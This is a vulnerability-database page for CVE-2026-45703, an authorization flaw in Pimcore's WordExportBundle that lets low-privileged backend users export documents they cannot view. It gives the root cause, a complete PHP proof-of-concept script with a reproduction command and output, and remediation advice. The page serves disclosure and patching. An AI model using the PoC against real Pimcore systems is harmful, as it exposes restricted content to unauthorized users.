Skip to main content

Pimcore WordExportBundle CVE-2026-45703

MEDIUM
Incorrect Authorization (CWE-863)
2026-05-27 https://github.com/pimcore/pimcore GHSA-332x-r494-54fq
6.4
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
6.4 MEDIUM
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:L

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:L
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
Low
Integrity
None
Availability
Low

Lifecycle Timeline

2
Source Code Evidence Fetched
May 27, 2026 - 22:55 vuln.today
Analysis Generated
May 27, 2026 - 22:55 vuln.today

DescriptionGitHub Advisory

Summary

The WordExport export flow only checks whether the current backend user has the feature permission word_export. It does not verify access rights on the target element itself. As a result, a low-privileged backend user can export document content even when the user does not have view permission on that document.

In the local Docker reproduction, a low-privileged user successfully exported sensitive content from a page the user was not allowed to view:

  • POC-WORDEXPORT-TITLE
  • POC-WORDEXPORT-DESC

Root Cause

The controller only performs a feature-level permission check before starting the export flow:

It then directly resolves the target element from attacker-controlled type/id input:

For document-like elements such as Page and Snippet, it renders content in an admin context:

  • [TranslationController.php](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L72)
  • [TranslationController.php](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L113)
  • [TranslationController.php](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L114)

No object-level authorization check such as isAllowed('view') is enforced on the target element.

Affected Scope

Based on the source code, the following element types may be affected:

  • page
  • snippet
  • email
  • object

For page-like documents, the pimcore_admin = true rendering context may expose additional backend-visible content.

Preconditions

  • The attacker is an authenticated backend user
  • The attacker has the word_export permission
  • The attacker does not have view permission on the target document

Reproduction Environment

  • Reproduction root: pimcore-12.3.3-repro
  • Standalone PoC script: [poc_wordexport.php](pimcore-12.3.3-repro/tools/poc_wordexport.php)
php
<?php
declare(strict_types=1);

use Pimcore\Bundle\WordExportBundle\Controller\TranslationController as WordExportController;
use Pimcore\Controller\UserAwareController;
use Pimcore\Model\Document\Page;
use Pimcore\Model\User;
use Pimcore\Security\User\TokenStorageUserResolver;
use Pimcore\Security\User\User as SecurityUser;
use Pimcore\Serializer\Serializer as PimcoreSerializer;
use Pimcore\Tool\Authentication;
use Symfony\Component\DependencyInjection\ContainerInterface;
use Symfony\Component\Filesystem\Filesystem;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\RequestStack;
use Symfony\Component\Security\Core\Authentication\Token\UsernamePasswordToken;
use Symfony\Component\Security\Core\Authentication\Token\Storage\TokenStorage;

require dirname(__DIR__) . '/vendor/autoload.php';

define('PIMCORE_PROJECT_ROOT', dirname(__DIR__));

try {
    \Pimcore\Bootstrap::bootstrap();

    $kernel = new \App\Kernel('dev', true);
    \Pimcore::setKernel($kernel);
    $kernel->boot();

    $container = $kernel->getContainer();

    /** @var RequestStack $requestStack */
    $requestStack = getService($container, [
        RequestStack::class,
        'request_stack',
    ]);

    $admin = User::getByName('admin');
    if (!$admin instanceof User) {
        fail('admin user is missing');
    }

    $auditor = User::getByName('auditor_wordexport');
    if (!$auditor instanceof User) {
        $auditor = new User();
        $auditor->setParentId(0);
        $auditor->setName('auditor_wordexport');
    }

    $auditor->setAdmin(false);
    $auditor->setActive(true);
    $auditor->setPassword(Authentication::getPasswordHash('auditor_wordexport', 'auditor-pass'));
    $auditor->setPermissions(['word_export']);
    $auditor->setRoles([]);
    $auditor->setWorkspacesDocument([]);
    $auditor->setWorkspacesAsset([]);
    $auditor->setWorkspacesObject([]);
    $auditor->save();

    $page = Page::getByPath('/poc-wordexport-secret-page');
    if (!$page instanceof Page) {
        $page = new Page();
        $page->setParentId(1);
        $page->setKey('poc-wordexport-secret-page');
    }

    $page->setPublished(true);
    $page->setController('App\\Controller\\DefaultController::defaultAction');
    $page->setTemplate('default/default.html.twig');
    $page->setTitle('POC-WORDEXPORT-TITLE');
    $page->setDescription('POC-WORDEXPORT-DESC');
    $page->setProperty('language', 'text', 'en', false, true);
    $page->setUserOwner($admin->getId());
    $page->setUserModification($admin->getId());
    $page->save();

    $canViewPage = $page->getDao()->isAllowed('view', $auditor);

    $tokenResolver = buildTokenResolver($auditor);
    $controller = wireController(new WordExportController(), $container, $tokenResolver);

    $exportId = 'wordexportpoc1';
    $exportRequest = new Request([], [
        'id' => $exportId,
        'data' => json_encode([
            ['type' => 'document', 'id' => $page->getId()],
        ], JSON_THROW_ON_ERROR),
        'source' => 'en',
    ]);

    $requestStack->push($exportRequest);
    $controller->wordExportAction($exportRequest, new Filesystem());
    $requestStack->pop();

    $downloadRequest = new Request(['id' => $exportId]);
    $requestStack->push($downloadRequest);
    $downloadResponse = $controller->wordExportDownloadAction($downloadRequest);
    $requestStack->pop();

    $wordContent = (string) $downloadResponse->getContent();

    echo json_encode([
        'vulnerability' => 'wordexport_authorization_bypass',
        'user' => [
            'id' => $auditor->getId(),
            'name' => $auditor->getName(),
            'permissions' => $auditor->getPermissions(),
        ],
        'target_page' => [
            'id' => $page->getId(),
            'path' => $page->getFullPath(),
            'title' => $page->getTitle(),
            'description' => $page->getDescription(),
            'user_can_view_page' => $canViewPage,
        ],
        'result' => [
            'download_contains_title' => str_contains($wordContent, 'POC-WORDEXPORT-TITLE'),
            'download_contains_description' => str_contains($wordContent, 'POC-WORDEXPORT-DESC'),
        ],
    ], JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES), PHP_EOL;
} catch (Throwable $e) {
    fail(sprintf(
        '%s: %s in %s:%d%s',
        $e::class,
        $e->getMessage(),
        $e->getFile(),
        $e->getLine(),
        $e->getTraceAsString() ? PHP_EOL . $e->getTraceAsString() : ''
    ));
}

function wireController(
    UserAwareController $controller,
    ContainerInterface $container,
    TokenStorageUserResolver $tokenResolver
): UserAwareController
{
    $controller->setContainer($container);
    $controller->setTokenResolver($tokenResolver);

    if (method_exists($controller, 'setPimcoreSerializer')) {
        /** @var PimcoreSerializer $serializer */
        $serializer = getService($container, [
            PimcoreSerializer::class,
            'Pimcore\\Serializer\\Serializer',
        ]);
        $controller->setPimcoreSerializer($serializer);
    }

    return $controller;
}

function buildTokenResolver(User $user): TokenStorageUserResolver
{
    $tokenStorage = new TokenStorage();
    $proxyUser = new SecurityUser($user);
    $token = new UsernamePasswordToken($proxyUser, 'pimcore_admin', $proxyUser->getRoles());
    $tokenStorage->setToken($token);

    return new TokenStorageUserResolver($tokenStorage);
}

function getService(ContainerInterface $container, array $ids): mixed
{
    foreach ($ids as $id) {
        try {
            if ($container->has($id)) {
                return $container->get($id);
            }
        } catch (Throwable) {
        }
    }

    fail('Unable to resolve service: ' . implode(', ', $ids));
}

function fail(string $message): never
{
    fwrite(STDERR, $message . PHP_EOL);
    exit(1);
}

Reproduction Steps

  1. Create a low-privileged user named auditor_wordexport with only the word_export permission and no document workspace permissions.
  2. Create a test page at /poc-wordexport-secret-page containing sensitive values:
  • title = POC-WORDEXPORT-TITLE
  • description = POC-WORDEXPORT-DESC
  1. Verify that the user does not have view permission on that page.
  2. Execute wordExportAction() and wordExportDownloadAction() as that user.
  3. Check whether the exported HTML contains the sensitive values.

Reproduction command:

bash
cd pimcore-12.3.3-repro
docker compose exec -T php php tools/poc_wordexport.php

Reproduction Result

Relevant PoC output:

json
{
  "vulnerability": "wordexport_authorization_bypass",
  "user": {
    "name": "auditor_wordexport",
    "permissions": [
      "word_export"
    ]
  },
  "target_page": {
    "path": "/poc-wordexport-secret-page",
    "title": "POC-WORDEXPORT-TITLE",
    "description": "POC-WORDEXPORT-DESC",
    "user_can_view_page": false
  },
  "result": {
    "download_contains_title": true,
    "download_contains_description": true
  }
}

This shows that:

  • The user cannot view the target page
  • The exported file still contains the page's sensitive content

This confirms that the issue is practically exploitable.

Security Impact

  • Unauthorized disclosure of structured page fields
  • Unauthorized export of restricted backend content
  • Potential exposure of unpublished or otherwise restricted content
  • Lateral data access by low-privileged backend accounts

Remediation

  1. Perform object-level authorization immediately after resolving the element from type/id.
  2. Require at least view permission on the target element.
  3. Apply consistent authorization checks across page, snippet, email, and object.
  4. Bind export creation and export download to the requesting user or an equivalent authorization context.
  5. Add regression tests to ensure that users with word_export but without element view permission cannot export content.

AnalysisAI

WordExportBundle in Pimcore CMS enforces only feature-level permission (word_export) at export initiation but performs no object-level authorization check against the target document element, constituting a broken object-level authorization (BOLA) flaw. Authenticated low-privileged backend users holding the word_export permission can supply arbitrary type/id parameters to wordExportAction() to export full content - including titles, descriptions, and body - from pages, snippets, emails, or objects they are explicitly denied view access to. A publicly available proof-of-concept script is included in the GitHub security advisory GHSA-332x-r494-54fq confirming practical exploitability; the vulnerability is not currently listed in CISA KEV.

Technical ContextAI

The flaw exists in WordExportBundle/src/Controller/TranslationController.php within the Pimcore CMS platform (Composer package pimcore/pimcore, CPE: pkg:composer/pimcore_pimcore). The vulnerable code path accepts attacker-controlled type and id HTTP request parameters, resolves the corresponding Pimcore element (Page, Snippet, Email, or Object model), and renders it in an admin context (pimcore_admin = true) for Word export - without ever calling isAllowed('view') on the resolved element. CWE-863 (Incorrect Authorization) precisely describes this class: the system verifies the capability permission (word_export) but omits the per-resource authorization check, allowing the feature to be exercised against content the user has no right to access. For page-like document types, rendering in admin context additionally exposes backend-only fields not visible to frontend users. The fix committed in PR #19112 (commit 0ce2232) adds !$element->isAllowed('view') as a short-circuit guard alongside the element-type check at the resolution point in wordExportAction().

RemediationAI

Upgrade pimcore/pimcore to version 12.3.7 or later using Composer (composer require pimcore/pimcore:^12.3.7), which includes the fix from PR #19112 (commit 0ce2232b6f92c79d0ac244e95e21f55c37456ef1) adding the missing isAllowed('view') authorization check on the resolved element in TranslationController::wordExportAction(). The vendor release is at https://github.com/pimcore/pimcore/releases/tag/v12.3.7 and the advisory at https://github.com/pimcore/pimcore/security/advisories/GHSA-332x-r494-54fq. If immediate upgrade is not feasible, revoke the word_export permission from all backend users whose content access scope does not encompass the full document tree - this eliminates the attack surface but disables the Word export feature entirely for those users, which may impact translation workflows. A second option is to restrict HTTP access to the Word export endpoint (/admin/word-export/* or equivalent route) at the web server or reverse proxy layer for non-admin roles; however, this requires precise route scoping to avoid breaking legitimate exports. The vendor additionally recommends adding regression tests to confirm that users with word_export but without element view permission cannot export content.

More in Docker

View all
CVE-2024-55964 CRITICAL POC
9.8 Mar 26

An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl

CVE-2019-5736 HIGH POC
8.6 Feb 11

runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac

CVE-2023-32077 HIGH POC
7.5 Aug 24

Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2023-5815 HIGH POC
8.1 Nov 22

The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post

CVE-2014-9357 CRITICAL
10.0 Dec 16

Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build

CVE-2026-34156 CRITICAL POC
9.9 Mar 30

Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l

CVE-2019-15752 HIGH POC
7.8 Aug 28

Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c

CVE-2025-34221 CRITICAL POC
10.0 Sep 29

Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2

CVE-2024-23054 CRITICAL POC
9.8 Feb 05

An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du

CVE-2025-23211 CRITICAL POC
9.9 Jan 28

Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve

CVE-2026-46339 CRITICAL POC
10.0 May 19

Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at

Share

CVE-2026-45703 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy